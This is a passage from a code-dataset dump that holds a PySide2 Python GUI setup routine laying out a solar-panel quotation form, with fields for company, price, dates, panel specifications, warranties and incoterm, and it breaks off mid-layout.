CSV)\n","repo_name":"IamFive/reliam2","sub_path":"reliam/choices.py","file_name":"choices.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25995768912","text":"from collections import namedtuple\n\nfrom PySide2 import QtCore, QtGui, QtWidgets\n\nfrom guis.g_quotation import GQuotation\nfrom guis.g_panel import GPanel\nfrom guis.g_price_bar_chart import GPriceBarChart\nfrom my_qt.buttons import CheckableMenuButton\nfrom my_qt.charts import PriceBarChart\nfrom my_qt.date_edits import NoWheelDateEdit\nfrom my_qt.combo_boxes import SearchCombo\nfrom my_qt.spin_boxes import NoWheelSpinBox, NoWheelDoubleSpinBox\nfrom resources import url_back, url_save, url_plus, url_minus\nfrom utilities.various import color_gray, color_red\n\n\nclass GPanelQuotation(GPriceBarChart, GPanel, GQuotation):\n def __init__(self, window):\n super(GPriceBarChart, self).__init__()\n super(GPanel, self).__init__(window)\n\n self.setup_gui()\n\n # Edited: SearchCombo, NoWheelSpinBox, NoWheelDoubleSpinBox, NoWheelDateEdit, PriceBarChartView(+delete below)\n def setup_gui(self):\n self.w.centralWidget = QtWidgets.QWidget(self.w)\n self.w.centralWidget.setObjectName('centralWidget')\n self.w.verticalLayout = QtWidgets.QVBoxLayout(self.w.centralWidget)\n self.w.verticalLayout.setSpacing(16)\n self.w.verticalLayout.setObjectName('verticalLayout')\n self.w.horizontalLayout_3 = QtWidgets.QHBoxLayout()\n self.w.horizontalLayout_3.setObjectName('horizontalLayout_3')\n self.w.buttonBack = QtWidgets.QPushButton(self.w.centralWidget)\n self.w.buttonBack.setMinimumSize(QtCore.QSize(50, 40))\n self.w.buttonBack.setMaximumSize(QtCore.QSize(50, 40))\n font = QtGui.QFont()\n font.setPointSize(13)\n self.w.buttonBack.setFont(font)\n self.w.buttonBack.setText('')\n self.w.buttonBack.setObjectName('buttonBack')\n self.w.horizontalLayout_3.addWidget(self.w.buttonBack)\n self.w.labelTitle = QtWidgets.QLabel(self.w.centralWidget)\n font = QtGui.QFont()\n font.setPointSize(25)\n self.w.labelTitle.setFont(font)\n self.w.labelTitle.setAlignment(QtCore.Qt.AlignCenter)\n self.w.labelTitle.setObjectName('labelTitle')\n self.w.horizontalLayout_3.addWidget(self.w.labelTitle)\n spacerItem = QtWidgets.QSpacerItem(50, 40, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)\n self.w.horizontalLayout_3.addItem(spacerItem)\n self.w.verticalLayout.addLayout(self.w.horizontalLayout_3)\n self.w.scrollArea = QtWidgets.QScrollArea(self.w.centralWidget)\n self.w.scrollArea.setWidgetResizable(True)\n self.w.scrollArea.setObjectName('scrollArea')\n self.w.scrollAreaWidgetContents = QtWidgets.QWidget()\n self.w.scrollAreaWidgetContents.setGeometry(QtCore.QRect(0, 0, 1178, 751))\n self.w.scrollAreaWidgetContents.setObjectName('scrollAreaWidgetContents')\n self.w.horizontalLayout_7 = QtWidgets.QHBoxLayout(self.w.scrollAreaWidgetContents)\n self.w.horizontalLayout_7.setSpacing(50)\n self.w.horizontalLayout_7.setObjectName('horizontalLayout_7')\n spacerItem1 = QtWidgets.QSpacerItem(29, 50, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.w.horizontalLayout_7.addItem(spacerItem1)\n self.w.verticalLayout_2 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_2.setObjectName('verticalLayout_2')\n self.w.groupGeneral = QtWidgets.QGroupBox(self.w.scrollAreaWidgetContents)\n self.w.groupGeneral.setMinimumSize(QtCore.QSize(250, 0))\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setWeight(75)\n font.setBold(True)\n self.w.groupGeneral.setFont(font)\n self.w.groupGeneral.setAlignment(QtCore.Qt.AlignCenter)\n self.w.groupGeneral.setObjectName('groupGeneral')\n self.w.verticalLayout_3 = QtWidgets.QVBoxLayout(self.w.groupGeneral)\n self.w.verticalLayout_3.setSpacing(20)\n self.w.verticalLayout_3.setObjectName('verticalLayout_3')\n self.w.verticalLayout_12 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_12.setSpacing(2)\n self.w.verticalLayout_12.setObjectName('verticalLayout_12')\n self.w.labelCompany = QtWidgets.QLabel(self.w.groupGeneral)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.w.labelCompany.setFont(font)\n self.w.labelCompany.setAlignment(QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter)\n self.w.labelCompany.setObjectName('labelCompany')\n self.w.verticalLayout_12.addWidget(self.w.labelCompany)\n self.w.horizontalLayout_6 = QtWidgets.QHBoxLayout()\n self.w.horizontalLayout_6.setObjectName('horizontalLayout_6')\n self.w.comboCompany = SearchCombo(self.w.groupGeneral)\n self.w.comboCompany.setMinimumSize(QtCore.QSize(0, 30))\n font = QtGui.QFont()\n font.setWeight(50)\n font.setBold(False)\n self.w.comboCompany.setFont(font)\n self.w.comboCompany.setObjectName('comboCompany')\n self.w.horizontalLayout_6.addWidget(self.w.comboCompany)\n self.w.buttonAddCompany = QtWidgets.QPushButton(self.w.groupGeneral)\n self.w.buttonAddCompany.setMinimumSize(QtCore.QSize(30, 30))\n self.w.buttonAddCompany.setMaximumSize(QtCore.QSize(30, 30))\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setWeight(50)\n font.setBold(False)\n self.w.buttonAddCompany.setFont(font)\n self.w.buttonAddCompany.setText('')\n self.w.buttonAddCompany.setObjectName('buttonAddCompany')\n self.w.horizontalLayout_6.addWidget(self.w.buttonAddCompany)\n self.w.verticalLayout_12.addLayout(self.w.horizontalLayout_6)\n self.w.verticalLayout_3.addLayout(self.w.verticalLayout_12)\n self.w.verticalLayout_28 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_28.setSpacing(2)\n self.w.verticalLayout_28.setObjectName('verticalLayout_28')\n self.w.labelMark = QtWidgets.QLabel(self.w.groupGeneral)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.w.labelMark.setFont(font)\n self.w.labelMark.setAlignment(QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter)\n self.w.labelMark.setObjectName('labelMark')\n self.w.verticalLayout_28.addWidget(self.w.labelMark)\n self.w.comboMark = SearchCombo(self.w.groupGeneral)\n self.w.comboMark.setMinimumSize(QtCore.QSize(0, 30))\n font = QtGui.QFont()\n font.setWeight(50)\n font.setBold(False)\n self.w.comboMark.setFont(font)\n self.w.comboMark.setObjectName('comboMark')\n self.w.verticalLayout_28.addWidget(self.w.comboMark)\n self.w.verticalLayout_3.addLayout(self.w.verticalLayout_28)\n self.w.verticalLayout_13 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_13.setSpacing(2)\n self.w.verticalLayout_13.setObjectName('verticalLayout_13')\n self.w.labelTotalPower = QtWidgets.QLabel(self.w.groupGeneral)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.w.labelTotalPower.setFont(font)\n self.w.labelTotalPower.setAlignment(QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter)\n self.w.labelTotalPower.setObjectName('labelTotalPower')\n self.w.verticalLayout_13.addWidget(self.w.labelTotalPower)\n self.w.spinTotalPower = NoWheelDoubleSpinBox(self.w.groupGeneral)\n self.w.spinTotalPower.setMinimumSize(QtCore.QSize(0, 30))\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setWeight(50)\n font.setBold(False)\n self.w.spinTotalPower.setFont(font)\n self.w.spinTotalPower.setFocusPolicy(QtCore.Qt.StrongFocus)\n self.w.spinTotalPower.setDecimals(3)\n self.w.spinTotalPower.setMaximum(9999999999.0)\n self.w.spinTotalPower.setObjectName('spinTotalPower')\n self.w.verticalLayout_13.addWidget(self.w.spinTotalPower)\n self.w.verticalLayout_3.addLayout(self.w.verticalLayout_13)\n self.w.verticalLayout_14 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_14.setSpacing(2)\n self.w.verticalLayout_14.setObjectName('verticalLayout_14')\n self.w.labelPrice = QtWidgets.QLabel(self.w.groupGeneral)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.w.labelPrice.setFont(font)\n self.w.labelPrice.setAlignment(QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter)\n self.w.labelPrice.setObjectName('labelPrice')\n self.w.verticalLayout_14.addWidget(self.w.labelPrice)\n self.w.spinPrice = NoWheelDoubleSpinBox(self.w.groupGeneral)\n self.w.spinPrice.setMinimumSize(QtCore.QSize(0, 30))\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setWeight(50)\n font.setBold(False)\n self.w.spinPrice.setFont(font)\n self.w.spinPrice.setFocusPolicy(QtCore.Qt.StrongFocus)\n self.w.spinPrice.setDecimals(4)\n self.w.spinPrice.setMaximum(9999999999.0)\n self.w.spinPrice.setObjectName('spinPrice')\n self.w.verticalLayout_14.addWidget(self.w.spinPrice)\n self.w.verticalLayout_3.addLayout(self.w.verticalLayout_14)\n self.w.verticalLayout_15 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_15.setSpacing(2)\n self.w.verticalLayout_15.setObjectName('verticalLayout_15')\n self.w.labelDateQuotation = QtWidgets.QLabel(self.w.groupGeneral)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.w.labelDateQuotation.setFont(font)\n self.w.labelDateQuotation.setAlignment(QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter)\n self.w.labelDateQuotation.setObjectName('labelDateQuotation')\n self.w.verticalLayout_15.addWidget(self.w.labelDateQuotation)\n self.w.dateQuotation = NoWheelDateEdit(self.w.groupGeneral)\n self.w.dateQuotation.setMinimumSize(QtCore.QSize(0, 30))\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setWeight(50)\n font.setBold(False)\n self.w.dateQuotation.setFont(font)\n self.w.dateQuotation.setCalendarPopup(True)\n self.w.dateQuotation.setObjectName('dateQuotation')\n self.w.verticalLayout_15.addWidget(self.w.dateQuotation)\n self.w.verticalLayout_3.addLayout(self.w.verticalLayout_15)\n self.w.verticalLayout_16 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_16.setSpacing(2)\n self.w.verticalLayout_16.setObjectName('verticalLayout_16')\n self.w.labelDateValidity = QtWidgets.QLabel(self.w.groupGeneral)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.w.labelDateValidity.setFont(font)\n self.w.labelDateValidity.setAlignment(QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter)\n self.w.labelDateValidity.setObjectName('labelDateValidity')\n self.w.verticalLayout_16.addWidget(self.w.labelDateValidity)\n self.w.dateValidity = NoWheelDateEdit(self.w.groupGeneral)\n self.w.dateValidity.setMinimumSize(QtCore.QSize(0, 30))\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setWeight(50)\n font.setBold(False)\n self.w.dateValidity.setFont(font)\n self.w.dateValidity.setCalendarPopup(True)\n self.w.dateValidity.setObjectName('dateValidity')\n self.w.verticalLayout_16.addWidget(self.w.dateValidity)\n self.w.verticalLayout_3.addLayout(self.w.verticalLayout_16)\n self.w.verticalLayout_27 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_27.setSpacing(2)\n self.w.verticalLayout_27.setObjectName('verticalLayout_27')\n self.w.labelNContacts = QtWidgets.QLabel(self.w.groupGeneral)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.w.labelNContacts.setFont(font)\n self.w.labelNContacts.setAlignment(QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter)\n self.w.labelNContacts.setObjectName('labelNContacts')\n self.w.verticalLayout_27.addWidget(self.w.labelNContacts)\n self.w.spinNContacts = NoWheelSpinBox(self.w.groupGeneral)\n self.w.spinNContacts.setMinimumSize(QtCore.QSize(0, 30))\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setWeight(50)\n font.setBold(False)\n self.w.spinNContacts.setFont(font)\n self.w.spinNContacts.setFocusPolicy(QtCore.Qt.StrongFocus)\n self.w.spinNContacts.setMaximum(9999)\n self.w.spinNContacts.setProperty('value', 1)\n self.w.spinNContacts.setObjectName('spinNContacts')\n self.w.verticalLayout_27.addWidget(self.w.spinNContacts)\n self.w.verticalLayout_3.addLayout(self.w.verticalLayout_27)\n self.w.verticalLayout_17 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_17.setSpacing(2)\n self.w.verticalLayout_17.setObjectName('verticalLayout_17')\n self.w.labelUser = QtWidgets.QLabel(self.w.groupGeneral)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.w.labelUser.setFont(font)\n self.w.labelUser.setAlignment(QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter)\n self.w.labelUser.setObjectName('labelUser')\n self.w.verticalLayout_17.addWidget(self.w.labelUser)\n self.w.comboUser = SearchCombo(self.w.groupGeneral)\n self.w.comboUser.setMinimumSize(QtCore.QSize(0, 30))\n font = QtGui.QFont()\n font.setWeight(50)\n font.setBold(False)\n self.w.comboUser.setFont(font)\n self.w.comboUser.setObjectName('comboUser')\n self.w.verticalLayout_17.addWidget(self.w.comboUser)\n self.w.verticalLayout_3.addLayout(self.w.verticalLayout_17)\n self.w.verticalLayout_18 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_18.setSpacing(2)\n self.w.verticalLayout_18.setObjectName('verticalLayout_18')\n self.w.labelObservations = QtWidgets.QLabel(self.w.groupGeneral)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.w.labelObservations.setFont(font)\n self.w.labelObservations.setObjectName('labelObservations')\n self.w.verticalLayout_18.addWidget(self.w.labelObservations)\n self.w.textObservations = QtWidgets.QTextEdit(self.w.groupGeneral)\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setWeight(50)\n font.setBold(False)\n self.w.textObservations.setFont(font)\n self.w.textObservations.setObjectName('textObservations')\n self.w.verticalLayout_18.addWidget(self.w.textObservations)\n self.w.verticalLayout_3.addLayout(self.w.verticalLayout_18)\n self.w.verticalLayout_2.addWidget(self.w.groupGeneral)\n self.w.horizontalLayout_7.addLayout(self.w.verticalLayout_2)\n spacerItem2 = QtWidgets.QSpacerItem(50, 50, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.w.horizontalLayout_7.addItem(spacerItem2)\n self.w.verticalLayout_4 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_4.setObjectName('verticalLayout_4')\n self.w.groupPanel = QtWidgets.QGroupBox(self.w.scrollAreaWidgetContents)\n self.w.groupPanel.setMinimumSize(QtCore.QSize(250, 0))\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setWeight(75)\n font.setBold(True)\n self.w.groupPanel.setFont(font)\n self.w.groupPanel.setAlignment(QtCore.Qt.AlignCenter)\n self.w.groupPanel.setObjectName('groupPanel')\n self.w.verticalLayout_6 = QtWidgets.QVBoxLayout(self.w.groupPanel)\n self.w.verticalLayout_6.setSpacing(20)\n self.w.verticalLayout_6.setObjectName('verticalLayout_6')\n self.w.verticalLayout_19 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_19.setSpacing(2)\n self.w.verticalLayout_19.setObjectName('verticalLayout_19')\n self.w.labelPanelType = QtWidgets.QLabel(self.w.groupPanel)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.w.labelPanelType.setFont(font)\n self.w.labelPanelType.setAlignment(QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter)\n self.w.labelPanelType.setObjectName('labelPanelType')\n self.w.verticalLayout_19.addWidget(self.w.labelPanelType)\n self.w.comboPanelType = SearchCombo(self.w.groupPanel)\n self.w.comboPanelType.setMinimumSize(QtCore.QSize(0, 30))\n font = QtGui.QFont()\n font.setWeight(50)\n font.setBold(False)\n self.w.comboPanelType.setFont(font)\n self.w.comboPanelType.setObjectName('comboPanelType')\n self.w.verticalLayout_19.addWidget(self.w.comboPanelType)\n self.w.verticalLayout_6.addLayout(self.w.verticalLayout_19)\n self.w.verticalLayout_20 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_20.setSpacing(2)\n self.w.verticalLayout_20.setObjectName('verticalLayout_20')\n self.w.labelCells = QtWidgets.QLabel(self.w.groupPanel)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.w.labelCells.setFont(font)\n self.w.labelCells.setAlignment(QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter)\n self.w.labelCells.setObjectName('labelCells')\n self.w.verticalLayout_20.addWidget(self.w.labelCells)\n self.w.comboCells = SearchCombo(self.w.groupPanel)\n self.w.comboCells.setMinimumSize(QtCore.QSize(0, 30))\n font = QtGui.QFont()\n font.setWeight(50)\n font.setBold(False)\n self.w.comboCells.setFont(font)\n self.w.comboCells.setObjectName('comboCells')\n self.w.verticalLayout_20.addWidget(self.w.comboCells)\n self.w.verticalLayout_6.addLayout(self.w.verticalLayout_20)\n self.w.verticalLayout_21 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_21.setSpacing(2)\n self.w.verticalLayout_21.setObjectName('verticalLayout_21')\n self.w.labelPanelPower = QtWidgets.QLabel(self.w.groupPanel)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.w.labelPanelPower.setFont(font)\n self.w.labelPanelPower.setAlignment(QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter)\n self.w.labelPanelPower.setObjectName('labelPanelPower')\n self.w.verticalLayout_21.addWidget(self.w.labelPanelPower)\n self.w.spinPanelPower = NoWheelSpinBox(self.w.groupPanel)\n self.w.spinPanelPower.setMinimumSize(QtCore.QSize(0, 30))\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setWeight(50)\n font.setBold(False)\n self.w.spinPanelPower.setFont(font)\n self.w.spinPanelPower.setFocusPolicy(QtCore.Qt.StrongFocus)\n self.w.spinPanelPower.setMaximum(999999999)\n self.w.spinPanelPower.setObjectName('spinPanelPower')\n self.w.verticalLayout_21.addWidget(self.w.spinPanelPower)\n self.w.verticalLayout_6.addLayout(self.w.verticalLayout_21)\n self.w.verticalLayout_29 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_29.setSpacing(2)\n self.w.verticalLayout_29.setObjectName('verticalLayout_29')\n self.w.labelEfficiency = QtWidgets.QLabel(self.w.groupPanel)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.w.labelEfficiency.setFont(font)\n self.w.labelEfficiency.setAlignment(QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter)\n self.w.labelEfficiency.setObjectName('labelEfficiency')\n self.w.verticalLayout_29.addWidget(self.w.labelEfficiency)\n self.w.spinEfficiency = NoWheelDoubleSpinBox(self.w.groupPanel)\n self.w.spinEfficiency.setMinimumSize(QtCore.QSize(0, 30))\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setWeight(50)\n font.setBold(False)\n self.w.spinEfficiency.setFont(font)\n self.w.spinEfficiency.setFocusPolicy(QtCore.Qt.StrongFocus)\n self.w.spinEfficiency.setDecimals(2)\n self.w.spinEfficiency.setMaximum(100.0)\n self.w.spinEfficiency.setObjectName('spinEfficiency')\n self.w.verticalLayout_29.addWidget(self.w.spinEfficiency)\n self.w.verticalLayout_6.addLayout(self.w.verticalLayout_29)\n self.w.verticalLayout_30 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_30.setSpacing(2)\n self.w.verticalLayout_30.setObjectName('verticalLayout_30')\n self.w.groupTolerance = QtWidgets.QGroupBox(self.w.groupPanel)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.w.groupTolerance.setFont(font)\n self.w.groupTolerance.setObjectName('groupTolerance')\n self.w.verticalLayout_8 = QtWidgets.QVBoxLayout(self.w.groupTolerance)\n self.w.verticalLayout_8.setObjectName('verticalLayout_8')\n self.w.horizontalLayout_8 = QtWidgets.QHBoxLayout()\n self.w.horizontalLayout_8.setObjectName('horizontalLayout_8')\n self.w.radioPositiveTolerance = QtWidgets.QRadioButton(self.w.groupTolerance)\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setWeight(50)\n font.setBold(False)\n self.w.radioPositiveTolerance.setFont(font)\n self.w.radioPositiveTolerance.setChecked(True)\n self.w.radioPositiveTolerance.setObjectName('radioPositiveTolerance')\n self.w.buttonGroup = QtWidgets.QButtonGroup(self.w.centralWidget)\n self.w.buttonGroup.setObjectName('buttonGroup')\n self.w.buttonGroup.addButton(self.w.radioPositiveTolerance)\n self.w.horizontalLayout_8.addWidget(self.w.radioPositiveTolerance)\n self.w.radioNegativeTolerance = QtWidgets.QRadioButton(self.w.groupTolerance)\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setWeight(50)\n font.setBold(False)\n self.w.radioNegativeTolerance.setFont(font)\n self.w.radioNegativeTolerance.setObjectName('radioNegativeTolerance')\n self.w.buttonGroup.addButton(self.w.radioNegativeTolerance)\n self.w.horizontalLayout_8.addWidget(self.w.radioNegativeTolerance)\n self.w.verticalLayout_8.addLayout(self.w.horizontalLayout_8)\n self.w.verticalLayout_30.addWidget(self.w.groupTolerance)\n self.w.verticalLayout_6.addLayout(self.w.verticalLayout_30)\n self.w.verticalLayout_32 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_32.setSpacing(2)\n self.w.verticalLayout_32.setObjectName('verticalLayout_32')\n self.w.labelWarrantyProduct = QtWidgets.QLabel(self.w.groupPanel)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.w.labelWarrantyProduct.setFont(font)\n self.w.labelWarrantyProduct.setAlignment(QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter)\n self.w.labelWarrantyProduct.setObjectName('labelWarrantyProduct')\n self.w.verticalLayout_32.addWidget(self.w.labelWarrantyProduct)\n self.w.spinWarrantyProduct = NoWheelSpinBox(self.w.groupPanel)\n self.w.spinWarrantyProduct.setMinimumSize(QtCore.QSize(0, 30))\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setWeight(50)\n font.setBold(False)\n self.w.spinWarrantyProduct.setFont(font)\n self.w.spinWarrantyProduct.setFocusPolicy(QtCore.Qt.StrongFocus)\n self.w.spinWarrantyProduct.setMaximum(9999)\n self.w.spinWarrantyProduct.setObjectName('spinWarrantyProduct')\n self.w.verticalLayout_32.addWidget(self.w.spinWarrantyProduct)\n self.w.verticalLayout_6.addLayout(self.w.verticalLayout_32)\n self.w.verticalLayout_33 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_33.setSpacing(2)\n self.w.verticalLayout_33.setObjectName('verticalLayout_33')\n self.w.labelWarrantyPerformance = QtWidgets.QLabel(self.w.groupPanel)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.w.labelWarrantyPerformance.setFont(font)\n self.w.labelWarrantyPerformance.setAlignment(\n QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter)\n self.w.labelWarrantyPerformance.setObjectName('labelWarrantyPerformance')\n self.w.verticalLayout_33.addWidget(self.w.labelWarrantyPerformance)\n self.w.spinWarrantyPerformance = NoWheelSpinBox(self.w.groupPanel)\n self.w.spinWarrantyPerformance.setMinimumSize(QtCore.QSize(0, 30))\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setWeight(50)\n font.setBold(False)\n self.w.spinWarrantyPerformance.setFont(font)\n self.w.spinWarrantyPerformance.setFocusPolicy(QtCore.Qt.StrongFocus)\n self.w.spinWarrantyPerformance.setMaximum(9999)\n self.w.spinWarrantyPerformance.setObjectName('spinWarrantyPerformance')\n self.w.verticalLayout_33.addWidget(self.w.spinWarrantyPerformance)\n self.w.verticalLayout_6.addLayout(self.w.verticalLayout_33)\n self.w.verticalLayout_22 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_22.setSpacing(2)\n self.w.verticalLayout_22.setObjectName('verticalLayout_22')\n self.w.labelCertificates = QtWidgets.QLabel(self.w.groupPanel)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.w.labelCertificates.setFont(font)\n self.w.labelCertificates.setObjectName('labelCertificates')\n self.w.verticalLayout_22.addWidget(self.w.labelCertificates)\n self.w.buttonCertificates = CheckableMenuButton(self.w.groupPanel)\n self.w.buttonCertificates.setMinimumSize(QtCore.QSize(0, 30))\n font = QtGui.QFont()\n font.setWeight(50)\n font.setBold(False)\n self.w.buttonCertificates.setFont(font)\n self.w.buttonCertificates.setText('')\n self.w.buttonCertificates.setObjectName('buttonCertificates')\n self.w.verticalLayout_22.addWidget(self.w.buttonCertificates)\n self.w.verticalLayout_6.addLayout(self.w.verticalLayout_22)\n self.w.verticalLayout_4.addWidget(self.w.groupPanel)\n spacerItem3 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\n self.w.verticalLayout_4.addItem(spacerItem3)\n self.w.horizontalLayout_7.addLayout(self.w.verticalLayout_4)\n spacerItem4 = QtWidgets.QSpacerItem(50, 50, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.w.horizontalLayout_7.addItem(spacerItem4)\n self.w.verticalLayout_11 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_11.setObjectName('verticalLayout_11')\n self.w.horizontalLayout = QtWidgets.QHBoxLayout()\n self.w.horizontalLayout.setObjectName('horizontalLayout')\n spacerItem5 = QtWidgets.QSpacerItem(50, 0, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.w.horizontalLayout.addItem(spacerItem5)\n self.w.verticalLayout_5 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_5.setObjectName('verticalLayout_5')\n self.w.groupGeographical = QtWidgets.QGroupBox(self.w.scrollAreaWidgetContents)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Minimum)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.w.groupGeographical.sizePolicy().hasHeightForWidth())\n self.w.groupGeographical.setSizePolicy(sizePolicy)\n self.w.groupGeographical.setMinimumSize(QtCore.QSize(250, 0))\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setWeight(75)\n font.setBold(True)\n self.w.groupGeographical.setFont(font)\n self.w.groupGeographical.setAlignment(QtCore.Qt.AlignCenter)\n self.w.groupGeographical.setObjectName('groupGeographical')\n self.w.verticalLayout_7 = QtWidgets.QVBoxLayout(self.w.groupGeographical)\n self.w.verticalLayout_7.setSpacing(20)\n self.w.verticalLayout_7.setObjectName('verticalLayout_7')\n self.w.verticalLayout_23 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_23.setSpacing(2)\n self.w.verticalLayout_23.setObjectName('verticalLayout_23')\n self.w.labelIncoterm = QtWidgets.QLabel(self.w.groupGeographical)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.w.labelIncoterm.setFont(font)\n self.w.labelIncoterm.setAlignment(QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter)\n self.w.labelIncoterm.setObjectName('labelIncoterm')\n self.w.verticalLayout_23.addWidget(self.w.labelIncoterm)\n self.w.comboIncoterm = SearchCombo(self.w.groupGeographical)\n self.w.comboIncoterm.setMinimumSize(QtCore.QSize(0, 30))\n font = QtGui.QFont()\n font.setWeight(50)\n font.setBold(False)\n self.w.comboIncoterm.setFont(font)\n self.w.comboIncoterm.setObjectName('comboIncoterm')\n self.w.verticalLayout_23.addWidget(self.w.comboIncoterm)\n self.w.verticalLayout_7.addLayout(self.w.verticalLayout_23)\n self.w.verticalLayout_24 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_24.setSpacing(2)\n self.w.verticalLayout_24.setObjectName('verticalLayout_24')\n self.w.labelMadeIn = QtWidgets.QLabel(self.w.groupGeographical)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.w.labelMadeIn.setFont(font)\n self.w.labelMadeIn.setAlignment(QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter)\n self.w.labelMadeIn.setObjectName('labelMadeIn')\n self.w.verticalLayout_24.addWidget(self.w.labelMadeIn)\n self.w.comboMadeIn = SearchCombo(self.w.groupGeographical)\n self.w.comboMadeIn.setMinimumSize(QtCore.QSize(0, 30))\n font = QtGui.QFont()\n font.setWeight(50)\n font.setBold(False)\n self.w.comboMadeIn.setFont(font)\n self.w.comboMadeIn.setObjectName('comboMadeIn')\n self.w.verticalLayout_24.addWidget(self.w.comboMadeIn)\n self.w.verticalLayout_7.addLayout(self.w.verticalLayout_24)\n self.w.verticalLayout_25 = QtWidgets.QVBoxLayout()\n 